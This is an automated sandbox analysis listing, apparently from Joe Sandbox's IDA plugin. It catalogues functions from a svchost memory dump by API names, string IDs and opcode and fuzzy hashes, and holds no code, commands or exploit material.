                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: dialer
                                            • API String ID: 756756679-3528709123
                                            • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction ID: 06783d0b336c43b6fb8f3cf0e459f23948a40912d03ff5635ea17d9edfbdb44c
                                            • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction Fuzzy Hash: 1F31A831701F7582EB55DF96AE4826A67A0FB447C6F046020AF4907BD9EF38C6A9C708
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction ID: 5f443a769d04d3adea556802eead3f678b55cddfadf8d773dddeaacf41c16662
                                            • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction Fuzzy Hash: 62018031300F5196EB50DB92A95C75A63A1F788FC2F484435DE8943798DE3CCA89C344
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction ID: 67865cf5ecda3e0ef2d77b708ba637a20954f1de08da6915a074c77a6b1aed6c
                                            • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction Fuzzy Hash: F4111775611F6086FB64DBA1ED0D75A67A0BB58BC7F042428DA494B7E9EF3CC608C708
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: 99e5b11989131456094ae1b2b7497338fd034adba382cd73036ced72e1ece174
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: A631AF32210BA196E714DF91ED4C71A37A9F744BCAF16A114BE5A077CEDB38CA45C708
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction ID: 1b038f0142236a24ced6044ad0faef4b883290b9e58a8ed610a7110b3a25747f
                                            • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction Fuzzy Hash: 8CF03132304B5192E760CBA5FA9839A6761F744BC9F849020DA4947A9CEE3DC748C704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction ID: c9fb27bfcac6e99e8fd94bc9e368736ec2bf4c7c393eae6b54a4519cfa6ad413
                                            • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction Fuzzy Hash: 7BF08224304FA191EA50CB93BF0C11A6221EB48FD2F08A131EE5A07BADDE3CC641C348
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction ID: 5c726715d9ad476fa7ebe1cdcd0cb63686d4be01401ca58cd6bd6853f82b4a4a
                                            • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction Fuzzy Hash: A302C732219B9086EB60CB95E99835AB7A0F3C5BD5F105115FA8E87BACDF7CC584CB04
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2210144848-0
                                            • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction ID: c07e3fbccd39fb9f6d1ac549793f1d58a0b0bce9570af4ff920596f5c891eacf
                                            • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction Fuzzy Hash: 0181D0B2610F7089FB50DBE1DE483AE27A0F754BCAF446116EE0A937D9DB348641C318
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction ID: 8bd7cdf491045c013809163f324ed5bb684671d1bf3b00075ecc160aad20f4e1
                                            • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction Fuzzy Hash: FB61A776619F50C6E760CB95E95831AB7A0F7887D9F102125FA8D87BE8DB7CC640CB08
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: 941447935e385e845102139b8ddcc0030948a823b7a2d3c3dbc15d29efe9af80
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: F6115422654F2105F66C91E4EE5D3AB10516F643F6E2C6625EA76076DE8B744F42C108
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction ID: e00bab76806325a9abdd15b433a0a8b9cf25c5bc0eff83bbe6d02225dab48dd1
                                            • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction Fuzzy Hash: E3113035714F5082EB54DB51F91825A6760F744BC5F041029EE89477D8EF3DC608C708
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction ID: 5455172ac10750761f807d933ea8cf4a6234d30aeae94710e3f4c62fee7eac61
                                            • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction Fuzzy Hash: C7119032514FA4D2E790CFA6AD0825A73B0F789FC6F045019EB8A03B99DF38C155C708
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction ID: c7236cf320714b2526d63330537b571de9eb5ebaef0cabde28b5695a523cc45a
                                            • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction Fuzzy Hash: 1371F332200FA14AE764DFA99E583EAA7A0F785BCAF442016EE4943BDDDE35C704C744
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction ID: 60bed6c58c811fc9480a51305fe544366d82a84ac1dbe4d575ecb31b521ad3ce
                                            • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction Fuzzy Hash: F351C632314FA146E674DEA9AA5C3AE6651F3857C1F056025EF8A03BDDCA35C705CB48
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction ID: 7485eb8d491204f1ce11cca0cfad3f404e2594ac8933616b6f6e0bc89ec83e76
                                            • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction Fuzzy Hash: 7041C372324F9085EB60DFA5E9583AAA7A0F7887D5F405025EE4D87BC8EB3CC641CB44
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Stringtry_get_function
                                            • String ID: LCMapStringEx
                                            • API String ID: 2588686239-3893581201
                                            • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction ID: 8af28ae692919d8603313224f70b36a1682288b8ea3ed641d4a538a4e1ae13c4
                                            • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction Fuzzy Hash: E3113836708B9086D760CB56B94429AB7A0F7C8BD0F545126EECD83B99DF38C550CB04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction ID: b07f5f03d25d9b158e06b28a41cbf469893b1758ade9a3a89ddfd8545b5bd687
                                            • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction Fuzzy Hash: 1D114F32204F9082EB60CF15E94425AB7A0F788BD9F185220EF9D077A9DF38C651CB04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                            • String ID: InitializeCriticalSectionEx
                                            • API String ID: 539475747-3084827643
                                            • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction ID: 0d0f94fa5005d2db52ee7415070b774ec8ea19bb2dd30d10148e5c694d7103fb
                                            • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction Fuzzy Hash: 37F0E921310FA0D1E714DBC1FE0819A3360AB88BC1F486121FA5903BDCCF38C655DB08
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Valuetry_get_function
                                            • String ID: FlsSetValue
                                            • API String ID: 738293619-3750699315
                                            • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction ID: 0510be533b4b701c4f3b3221e1973f29b97969593a1eb9b8a712a22ce5183e26
                                            • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction Fuzzy Hash: C3E06561310F50D1EB45DBD0FE0C69A2261AB887C2F88A122E619072DDCE38CA55DB08
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction ID: 7ab728e6ec886f2f157317706328fc7fc6e624865e902428bb9ec71c262b5bca
                                            • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction Fuzzy Hash: 2F219532604FA0C5EB52CF99E90829AF3A0FB84BD5F155110EE8C47B99EF78C646C704
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction ID: 046ab16719213f55cb861d30c128802dd52e7fa93de647e3b09efeb0b4122294
                                            • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction Fuzzy Hash: 69E06571A11B10C6E748CFA2DC0834A37E1FB88F82F48D024C909073A8DF7D869ADB80